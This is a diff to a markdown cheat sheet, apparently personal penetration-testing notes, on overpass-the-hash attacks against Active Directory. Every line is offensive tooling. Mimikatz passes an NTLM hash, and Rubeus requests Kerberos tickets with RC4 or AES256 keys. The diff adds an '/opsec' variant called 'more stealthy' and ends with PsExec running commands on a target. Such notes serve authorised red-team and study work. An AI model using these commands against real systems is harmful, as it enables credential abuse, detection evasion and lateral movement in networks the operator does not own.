stellastrareviews/ky4meru.github.io/docs/active-directory/overpassthehash.md

 # With Mimikatz.
 sekurlsa::pth /user:$username /domain:$domain /ntlm:$hash /run:powershell

-# TGT Kerberos ticket will be generated at this moment
+# TGT Kerberos ticket will be generated at this moment.
 net use \\$target

-# Another way to get the TGT is to use Rubeus.
+# Using Rubeus (add /ptt if you directly want to inject the ticket in your current session).
-.\Rubeus.exe asktgt /domain:$domain /user:$username /rc4:$hash /ptt
+.\Rubeus.exe asktgt /domain:$domain /user:$username /rc4:$hash /nowrap

+# More stealthy since RC4 is deprecated.
+.\Rubeus.exe asktgt /domain:$domain /user:$username /aes256:$hash /opsec /nowrap

 # Now you can use PsExec.
 .\PsExec.exe \\$target $cmd